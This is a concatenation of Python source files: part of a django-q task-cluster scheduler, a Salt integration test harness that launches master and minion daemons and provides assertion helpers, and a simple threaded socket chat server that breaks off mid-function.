if Conf.CATCH_UP or next_run > arrow.utcnow():
break
# arrow always returns a tz aware datetime, and we don't want
# this when we explicitly configured django with USE_TZ=False
s.next_run = (
next_run.datetime
if settings.USE_TZ
else next_run.datetime.replace(tzinfo=None)
)
s.repeats += -1
# send it to the cluster
scheduled_broker = broker
try:
scheduled_broker = get_broker(q_options["broker_name"])
except: # invalid broker_name or non existing broker with broker_name
pass
q_options["broker"] = scheduled_broker
q_options["group"] = q_options.get("group", s.name or s.id)
kwargs["q_options"] = q_options
s.task = django_q.tasks.async_task(s.func, *args, **kwargs)
# log it
if not s.task:
logger.error(
_(
f"{current_process().name} failed to create a task from schedule [{s.name or s.id}]"
)
)
else:
logger.info(
_(
f"{current_process().name} created a task from schedule [{s.name or s.id}]"
)
)
# default behavior is to delete a ONCE schedule
if s.schedule_type == s.ONCE:
if s.repeats < 0:
s.delete()
continue
# but not if it has a positive repeats
s.repeats = 0
# save the schedule
s.save()
except Exception as e:
logger.error(e)
def close_old_django_connections():
"""
Close django connections unless running with sync=True.
"""
if Conf.SYNC:
logger.warning(
"Preserving django database connections because sync=True. Beware "
"that tasks are now injected in the calling context/transactions "
"which may result in unexpected bahaviour."
)
else:
db.close_old_connections()
def set_cpu_affinity(n: int, process_ids: list, actual: bool = not Conf.TESTING):
"""
Sets the cpu affinity for the supplied processes.
Requires the optional psutil module.
:param int n: affinity
:param list process_ids: a list of pids
:param bool actual: Test workaround for Travis not supporting cpu affinity
"""
# check if we have the psutil module
if not psutil:
logger.warning("Skipping cpu affinity because psutil was not found.")
return
# check if the platform supports cpu_affinity
if actual and not hasattr(psutil.Process(process_ids[0]), "cpu_affinity"):
logger.warning(
"Faking cpu affinity because it is not supported on this platform"
)
actual = False
# get the available processors
cpu_list = list(range(psutil.cpu_count()))
# an affinity of 0, or one >= the cpu count, amounts to no affinity
if not n or n >= len(cpu_list):
return
# spread the workers over the available processors.
index = 0
for pid in process_ids:
affinity = []
for k in range(n):
if index == len(cpu_list):
index = 0
affinity.append(cpu_list[index])
index += 1
if psutil.pid_exists(pid):
p = psutil.Process(pid)
if actual:
p.cpu_affinity(affinity)
logger.info(_(f"{pid} will use cpu {affinity}"))
def rss_check():
if Conf.MAX_RSS:
if resource:
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss >= Conf.MAX_RSS
elif psutil:
return psutil.Process().memory_info().rss >= Conf.MAX_RSS * 1024
return False
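# --- Hedged usage sketch (not part of upstream django-q) ---------------------
# Illustrates how the pieces above fit together, assuming a configured Django
# project; normally the cluster is started with `python manage.py qcluster` and
# tasks are enqueued through django_q.tasks.async_task.
def _example_cluster_usage():
    """Illustrative only: start a cluster, enqueue a task, then stop it."""
    q = Cluster()                           # uses the default broker from Conf
    q.start()                               # forks the Sentinel, which spawns pusher/workers/monitor
    task_id = django_q.tasks.async_task("math.sqrt", 16)  # pusher -> worker -> monitor pipeline
    q.stop()                                # poison-pills the queues and joins the processes
    return task_id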
|
__init__.py
|
'''
Set up the Salt integration test suite
'''
# Import Python libs
import optparse
import multiprocessing
import os
import sys
import shutil
import tempfile
import time
import signal
import subprocess
from hashlib import md5
from subprocess import PIPE, Popen
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import Salt libs
import salt
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
from saltunittest import TestCase, RedirectStdStreams
try:
import console
width, height = console.getTerminalSize()
PNUM = width
except:
PNUM = 70
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
PYEXEC = 'python{0}.{1}'.format(sys.version_info[0], sys.version_info[1])
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
def print_header(header, sep='~', top=True, bottom=True, inline=False,
centered=False):
'''
Allows some pretty printing of headers on the console, either with a
"ruler" on bottom and/or top, inline, centered, etc.
'''
if top and not inline:
print(sep * PNUM)
if centered and not inline:
fmt = u'{0:^{width}}'
elif inline and not centered:
fmt = u'{0:{sep}<{width}}'
elif inline and centered:
fmt = u'{0:{sep}^{width}}'
else:
fmt = u'{0}'
print(fmt.format(header, sep=sep, width=PNUM))
if bottom and not inline:
print(sep * PNUM)
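# Example (illustrative only):
#   print_header('Versions Report', sep='=', centered=True)
# prints a '=' ruler, the centered title and a closing ruler; with inline=True
# the title is embedded in a single ruler line instead.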
def run_tests(TestCase):
'''
Run integration tests for a chosen test case.
Function uses optparse to set up test environment
'''
from saltunittest import TestLoader, TextTestRunner
opts = parse_opts()
loader = TestLoader()
tests = loader.loadTestsFromTestCase(TestCase)
print('Setting up Salt daemons to execute tests')
with TestDaemon(opts):
runner = TextTestRunner(verbosity=opts.verbosity).run(tests)
sys.exit(runner.wasSuccessful())
def parse_opts():
'''
Parse command line options for running integration tests
'''
parser = optparse.OptionParser()
parser.add_option('-v',
'--verbose',
dest='verbosity',
default=1,
action='count',
help='Verbose test runner output')
parser.add_option('--clean',
dest='clean',
default=True,
action='store_true',
help=('Clean up test environment before and after '
'integration testing (default behaviour)'))
parser.add_option('--no-clean',
dest='clean',
action='store_false',
help=('Don\'t clean up test environment before and after '
'integration testing (speed up test process)'))
# These two flags are read later by TestDaemon (versions/grains report and
# colored output); without them run_tests() would fail with AttributeError.
parser.add_option('--sysinfo',
dest='sysinfo',
default=False,
action='store_true',
help='Print the versions report and minion grains before running tests')
parser.add_option('--no-colors',
dest='no_colors',
default=False,
action='store_true',
help='Disable colored output')
options, _ = parser.parse_args()
return options
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, opts=None):
self.opts = opts
self.colors = get_colors(opts.no_colors is False)
def __enter__(self):
'''
Start a master and minion
'''
self.master_opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
self.minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
)
#if sys.version_info < (2, 7):
# self.minion_opts['multiprocessing'] = False
self.sub_minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
#if sys.version_info < (2, 7):
# self.sub_minion_opts['multiprocessing'] = False
self.smaster_opts = salt.config.master_config(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
)
)
self.syndic_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'))
self.syndic_opts['_master_conf_file'] = os.path.join(
INTEGRATION_TEST_DIR,
'files/conf/master'
)
# Set up config options that require internal data
self.master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
self.master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
TMP_STATE_TREE
]
}
self.master_opts['ext_pillar'] = [
{'cmd_yaml': 'cat {0}'.format(
os.path.join(
FILES,
'ext.yaml'
)
)}
]
# clean up the old files
self._clean()
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
self.master_opts[optname] = optname_path
self.minion_opts[optname] = optname_path
self.sub_minion_opts[optname] = optname_path
verify_env([os.path.join(self.master_opts['pki_dir'], 'minions'),
os.path.join(self.master_opts['pki_dir'], 'minions_pre'),
os.path.join(self.master_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.master_opts['cachedir'], 'jobs'),
os.path.join(self.smaster_opts['pki_dir'], 'minions'),
os.path.join(self.smaster_opts['pki_dir'], 'minions_pre'),
os.path.join(self.smaster_opts['pki_dir'],
'minions_rejected'),
os.path.join(self.smaster_opts['cachedir'], 'jobs'),
os.path.dirname(self.master_opts['log_file']),
self.minion_opts['extension_modules'],
self.sub_minion_opts['extension_modules'],
self.sub_minion_opts['pki_dir'],
self.master_opts['sock_dir'],
self.smaster_opts['sock_dir'],
self.sub_minion_opts['sock_dir'],
self.minion_opts['sock_dir'],
TMP_STATE_TREE,
TMP
],
pwd.getpwuid(os.getuid()).pw_name)
# Set up PATH to mockbin
self._enter_mockbin()
master = salt.master.Master(self.master_opts)
self.master_process = multiprocessing.Process(target=master.start)
self.master_process.start()
minion = salt.minion.Minion(self.minion_opts)
self.minion_process = multiprocessing.Process(target=minion.tune_in)
self.minion_process.start()
sub_minion = salt.minion.Minion(self.sub_minion_opts)
self.sub_minion_process = multiprocessing.Process(
target=sub_minion.tune_in
)
self.sub_minion_process.start()
smaster = salt.master.Master(self.smaster_opts)
self.smaster_process = multiprocessing.Process(target=smaster.start)
self.smaster_process.start()
syndic = salt.minion.Syndic(self.syndic_opts)
self.syndic_process = multiprocessing.Process(target=syndic.tune_in)
self.syndic_process.start()
if os.environ.get('DUMP_SALT_CONFIG', None) is not None:
from copy import deepcopy
try:
import yaml
os.makedirs('/tmp/salttest/conf')
except OSError:
pass
master_opts = deepcopy(self.master_opts)
minion_opts = deepcopy(self.minion_opts)
master_opts.pop('conf_file', None)
master_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
minion_opts['user'] = pwd.getpwuid(os.getuid()).pw_name
minion_opts.pop('conf_file', None)
minion_opts.pop('grains', None)
minion_opts.pop('pillar', None)
open('/tmp/salttest/conf/master', 'w').write(
yaml.dump(master_opts)
)
open('/tmp/salttest/conf/minion', 'w').write(
yaml.dump(minion_opts)
)
self.minion_targets = set(['minion', 'sub_minion'])
self.pre_setup_minions()
self.setup_minions()
if self.opts.sysinfo:
from salt import version
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(version.versions_report()))
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
)
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a later stage. If it were created on `__enter__` as it
previously was, it would not receive the master events.
'''
return salt.client.LocalClient(
mopts=self.master_opts
)
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.minion_process.terminate()
self.master_process.terminate()
self.syndic_process.terminate()
self.smaster_process.terminate()
self._exit_mockbin()
self._clean()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
# Wait for minions to connect back
wait_minion_connections = multiprocessing.Process(
target=self.wait_for_minion_connections,
args=(self.minion_targets, self.MINIONS_CONNECT_TIMEOUT)
)
wait_minion_connections.start()
wait_minion_connections.join()
wait_minion_connections.terminate()
if wait_minion_connections.exitcode > 0:
print(
'\n {RED_BOLD}*{ENDC} ERROR: Minions failed to connect'.format(
**self.colors
)
)
return False
del(wait_minion_connections)
sync_needed = self.opts.clean
if self.opts.clean is False:
def sumfile(fpath):
# Since we will be doing this for small files, it should be OK
fobj = fopen(fpath)
m = md5()
while True:
d = fobj.read(8096)
if not d:
break
m.update(d)
return m.hexdigest()
# Since we're not cleaning up, let's see if modules are already up
# to date so we don't need to re-sync them
modules_dir = os.path.join(FILES, 'file', 'base', '_modules')
for fname in os.listdir(modules_dir):
if not fname.endswith('.py'):
continue
dfile = os.path.join(
'/tmp/salttest/cachedir/extmods/modules/', fname
)
if not os.path.exists(dfile):
sync_needed = True
break
sfile = os.path.join(modules_dir, fname)
if sumfile(sfile) != sumfile(dfile):
sync_needed = True
break
if sync_needed:
# Wait for minions to "sync_all"
sync_minions = multiprocessing.Process(
target=self.sync_minion_modules,
args=(self.minion_targets, self.MINIONS_SYNC_TIMEOUT)
)
sync_minions.start()
sync_minions.join()
if sync_minions.exitcode > 0:
return False
sync_minions.terminate()
del(sync_minions)
return True
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
def _clean(self):
'''
Clean out the tmp files
'''
if not self.opts.clean:
return
if os.path.isdir(self.sub_minion_opts['root_dir']):
shutil.rmtree(self.sub_minion_opts['root_dir'])
if os.path.isdir(self.master_opts['root_dir']):
shutil.rmtree(self.master_opts['root_dir'])
if os.path.isdir(self.smaster_opts['root_dir']):
shutil.rmtree(self.smaster_opts['root_dir'])
if os.path.isdir(TMP):
shutil.rmtree(TMP)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
if not running and job_finished is False:
# Let's avoid false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else:
sys.stdout.write(
'\n {RED_BOLD}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', expr_form='list'
)
return [
k for (k, v) in running.iteritems() if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' * {YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
responses = self.client.cmd(
list(expected_connections), 'test.ping', expr_form='list',
)
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
print target
continue
expected_connections.remove(target)
sys.stdout.write('\r' + ' ' * PNUM + '\r')
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else:
print(
'\n {RED_BOLD}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules(self, targets, timeout=120):
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing modules for minions {0} '
'(saltutil.sync_modules)'.format(
', '.join(targets),
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_modules',
expr_form='list',
timeout=9999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {RED_BOLD}*{ENDC} WARNING: Minions failed to sync modules. '
'Tests requiring these modules WILL fail'.format(**self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in rdata.iteritems():
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} modules: '
'{1}'.format(
name, ', '.join(output['ret']), **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {RED_BOLD}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
class SaltClientTestCaseMixIn(object):
_salt_client_config_file_name_ = 'master'
__slots__ = ('client', '_salt_client_config_file_name_')
@property
def client(self):
return salt.client.LocalClient(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf',
self._salt_client_config_file_name_
)
)
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a module function
'''
def minion_run(self, _function, *args, **kw):
'''
Run a single salt function on the 'minion' target and condition
the return down to match the behavior of the raw function call
'''
return self.run_function(_function, args, **kw)
def run_function(self, function, arg=(), minion_tgt='minion', timeout=30,
**kwargs):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
know_to_return_none = ('file.chown', 'file.chgrp')
orig = self.client.cmd(
minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
)
if minion_tgt not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion \'{0}\'. Command output: {1}'.format(
minion_tgt, orig
)
)
elif orig[minion_tgt] is None and function not in know_to_return_none:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
'the minion \'{1}\'. Command output: {2}'.format(
function, minion_tgt, orig
)
)
return orig[minion_tgt]
def run_state(self, function, **kwargs):
'''
Run the state.single command and return the state return structure
'''
return self.run_function('state.single', [function], **kwargs)
@property
def minion_opts(self):
'''
Return the options used for the minion
'''
return salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'minion')
)
@property
def sub_minion_opts(self):
'''
Return the options used for the sub_minion
'''
return salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
@property
def master_opts(self):
'''
Return the options used for the master
'''
return salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
class SyndicCase(TestCase, SaltClientTestCaseMixIn):
'''
Execute a syndic based execution test
'''
_salt_client_config_file_name_ = 'syndic_master'
def run_function(self, function, arg=()):
'''
Run a single salt function and condition the return down to match the
behavior of the raw function call
'''
orig = self.client.cmd('minion', function, arg, timeout=30)
if 'minion' not in orig:
self.skipTest(
'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
'from the minion. Command output: {0}'.format(orig)
)
return orig['minion']
class ShellCase(TestCase):
'''
Execute a test for a shell command
'''
def run_script(self, script, arg_str, catch_stderr=False, timeout=None):
'''
Execute a script with the given argument string
'''
path = os.path.join(SCRIPT_DIR, script)
if not os.path.isfile(path):
return False
ppath = 'PYTHONPATH={0}:{1}'.format(CODE_DIR, ':'.join(sys.path[1:]))
cmd = '{0} {1} {2} {3}'.format(ppath, PYEXEC, path, arg_str)
popen_kwargs = {
'shell': True,
'stdout': PIPE
}
if catch_stderr is True:
popen_kwargs['stderr'] = PIPE
if not sys.platform.lower().startswith('win'):
popen_kwargs['close_fds'] = True
def detach_from_parent_group():
# detach from parent group (no more inherited signals!)
os.setpgrp()
popen_kwargs['preexec_fn'] = detach_from_parent_group
elif sys.platform.lower().startswith('win') and timeout is not None:
raise RuntimeError('Timeout is not supported under windows')
process = Popen(cmd, **popen_kwargs)
if timeout is not None:
stop_at = datetime.now() + timedelta(seconds=timeout)
term_sent = False
while True:
process.poll()
if process.returncode is not None:
break
if datetime.now() > stop_at:
if term_sent is False:
# Kill the process group since sending the term signal
# would only terminate the shell, not the command
# executed in the shell
os.killpg(os.getpgid(process.pid), signal.SIGINT)
term_sent = True
continue
# As a last resort, kill the process group
os.killpg(os.getpgid(process.pid), signal.SIGKILL)
out = [
'Process took more than {0} seconds to complete. '
'Process Killed!'.format(timeout)
]
if catch_stderr:
return out, [
'Process killed, unable to catch stderr output'
]
return out
if catch_stderr:
if sys.version_info < (2, 7):
# On python 2.6, the subprocess's communicate() method uses
# select, which is limited by the OS to 1024 file descriptors
# We need more available descriptors to run the tests which
# need the stderr output.
# So instead of .communicate() we wait for the process to
# finish, but, as the python docs state "This will deadlock
# when using stdout=PIPE and/or stderr=PIPE and the child
# process generates enough output to a pipe such that it
# blocks waiting for the OS pipe buffer to accept more data.
# Use communicate() to avoid that." <- a catch, catch situation
#
# Use this work around were it's needed only, python 2.6
process.wait()
out = process.stdout.read()
err = process.stderr.read()
else:
out, err = process.communicate()
# Force closing stderr/stdout to release file descriptors
process.stdout.close()
process.stderr.close()
try:
return out.splitlines(), err.splitlines()
finally:
try:
process.terminate()
except OSError as err:
# process already terminated
pass
data = process.communicate()
process.stdout.close()
try:
return data[0].splitlines()
finally:
try:
process.terminate()
except OSError as err:
# process already terminated
pass
def run_salt(self, arg_str):
'''
Execute salt
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt', arg_str)
def run_run(self, arg_str):
'''
Execute salt-run
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-run', arg_str)
def run_run_plus(self, fun, options='', *arg):
'''
Execute Salt run and the salt run function and return the data from
each in a dict
'''
ret = {}
ret['out'] = self.run_run(
'{0} {1} {2}'.format(options, fun, ' '.join(arg))
)
opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
opts.update({'doc': False, 'fun': fun, 'arg': arg})
with RedirectStdStreams():
runner = salt.runner.Runner(opts)
ret['fun'] = runner.run()
return ret
def run_key(self, arg_str, catch_stderr=False):
'''
Execute salt-key
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '-c {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-key', arg_str, catch_stderr=catch_stderr)
def run_cp(self, arg_str):
'''
Execute salt-cp
'''
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-cp', arg_str)
def run_call(self, arg_str):
mconf = os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf')
arg_str = '--config-dir {0} {1}'.format(mconf, arg_str)
return self.run_script('salt-call', arg_str)
class ShellCaseCommonTestsMixIn(object):
def test_version_includes_binary_name(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(self._call_binary_, out)
self.assertIn(salt.__version__, out)
def test_salt_with_git_version(self):
if getattr(self, '_call_binary_', None) is None:
self.skipTest('\'_call_binary_\' not defined.')
from salt.utils import which
from salt.version import __version_info__
git = which('git')
if not git:
self.skipTest('The git binary is not available')
# Let's get the output of git describe
process = subprocess.Popen(
[git, 'describe'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=CODE_DIR
)
out, err = process.communicate()
if not out:
self.skipTest(
'Failed to get the output of \'git describe\'. '
'Error: {0!r}'.format(
err
)
)
parsed_version = '{0}'.format(out.strip().lstrip('v'))
parsed_version_info = tuple([
int(i) for i in parsed_version.split('-', 1)[0].split('.')
])
if parsed_version_info and parsed_version_info < __version_info__:
self.skipTest(
'We\'re likely about to release a new version. '
'This test would fail. Parsed({0!r}) < Expected({1!r})'.format(
parsed_version_info, __version_info__
)
)
elif parsed_version_info != __version_info__:
self.skipTest(
'In order to get the proper salt version with the '
'git hash you need to update salt\'s local git '
'tags. Something like: \'git fetch --tags\' or '
'\'git fetch --tags upstream\' if you followed '
'salt\'s contribute documentation. The version '
'string WILL NOT include the git hash.'
)
out = '\n'.join(self.run_script(self._call_binary_, '--version'))
self.assertIn(parsed_version, out)
class SaltReturnAssertsMixIn(object):
def assertReturnSaltType(self, ret):
try:
self.assertTrue(isinstance(ret, dict))
except AssertionError:
raise AssertionError(
'{0} is not dict. Salt returned: {1}'.format(
type(ret).__name__, ret
)
)
def assertReturnNonEmptySaltType(self, ret):
self.assertReturnSaltType(ret)
try:
self.assertNotEqual(ret, {})
except AssertionError:
raise AssertionError(
'{0} is equal to {1}. Salt returned an empty dictionary.'.format(ret, {})
)
def __return_valid_keys(self, keys):
if isinstance(keys, tuple):
# If it's a tuple, turn it into a list
keys = list(keys)
elif isinstance(keys, basestring):
# If it's a basestring , make it a one item list
keys = [keys]
elif not isinstance(keys, list):
# If we've reached here, it's a bad type passed to keys
raise RuntimeError('The passed keys need to be a list')
return keys
def __getWithinSaltReturn(self, ret, keys):
self.assertReturnNonEmptySaltType(ret)
keys = self.__return_valid_keys(keys)
okeys = keys[:]
for part in ret.itervalues():
try:
ret_item = part[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
while okeys:
try:
ret_item = ret_item[okeys.pop(0)]
except (KeyError, TypeError):
raise AssertionError(
'Could not get ret{0} from salt\'s return: {1}'.format(
''.join(['[{0!r}]'.format(k) for k in keys]), part
)
)
return ret_item
def assertSaltTrueReturn(self, ret):
try:
self.assertTrue(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
try:
raise AssertionError(
'{result} is not True. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except AttributeError:
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltFalseReturn(self, ret):
try:
self.assertFalse(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
try:
raise AssertionError(
'{result} is not False. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except AttributeError:
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertSaltNoneReturn(self, ret):
try:
self.assertIsNone(self.__getWithinSaltReturn(ret, 'result'))
except AssertionError:
try:
raise AssertionError(
'{result} is not None. Salt Comment:\n{comment}'.format(
**(ret.values()[0])
)
)
except AttributeError:
raise AssertionError(
'Failed to get result. Salt Returned: {0}'.format(ret)
)
def assertInSaltComment(self, ret, in_comment):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, ret, not_in_comment):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
def assertInSaltReturn(self, ret, item_to_check, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, ret, item_to_check, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
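# Illustrative sketch (not part of the mixin above): the helpers expect the usual salt
# state return shape -- a dict keyed by state id whose values carry 'result', 'comment'
# and 'changes'. The sample return below is hypothetical.
_example_state_return = {
    'file_|-deploy_|-/tmp/managed_|-managed': {
        'result': True,
        'comment': 'File /tmp/managed updated',
        'changes': {'diff': 'New file'},
    }
}
# Inside a test case that mixes in SaltReturnAssertsMixIn one could then write, e.g.:
#     self.assertSaltTrueReturn(_example_state_return)
#     self.assertInSaltComment(_example_state_return, 'updated')
#     self.assertSaltStateChangesEqual(_example_state_return, 'New file', keys='diff')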
|
Host.py
|
import socket
import threading
import sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.bind(('192.168.101.9', 5967))
s.listen(5)
name = ['sdf', 'sdf', 'sdf']  # unused placeholder list
connname = []  # sockets of all connected clients
print("HOST STARTED SUCCESSFULLY\n")

def connect():
    # accept new clients, greet them, and start a receive thread per connection
    while True:
        try:
            conn, addr = s.accept()
            user_name = conn.recv(1024)
            user_name = user_name.decode()
            print(f"Name :- {user_name} has connected")
            conn.send(f"Hello {user_name} you successfully connected to {conn.getsockname()}".encode())
            connname.append(conn)
            message_for_all_users = f"{user_name} has joined the chatroom"
            sent(conn, message_for_all_users)
            t = threading.Thread(target=recv, args=(conn, user_name,))
            t.start()
        except Exception as e:
            print(e)

def sent(conn_name, recv_msg):
    # broadcast the message to every connected client except the sender
    for namess in connname:
        if conn_name != namess:
            namess.send(recv_msg.encode())

def recv(conn, user_name):
    # per-client receive loop: prefix each message with the sender and relay it
    while True:
        recv_msg = conn.recv(1024)
        if not recv_msg:
            sys.exit(0)
        recv_msg = recv_msg.decode()
        recv_msg = f"{user_name}>> {recv_msg}"
        sent(conn, recv_msg)

t = threading.Thread(target=connect)
t.start()
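# Hedged companion sketch (not part of the original Host.py): a minimal client matching
# the protocol above -- it sends the user name first, then prints whatever the host
# relays while forwarding typed lines. The hard-coded address simply mirrors the bind
# address above and is an assumption about the deployment.
def example_client(user_name, host='192.168.101.9', port=5967):
    c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    c.connect((host, port))
    c.send(user_name.encode())  # the host treats the first message as the user name

    def reader():
        while True:
            data = c.recv(1024)
            if not data:
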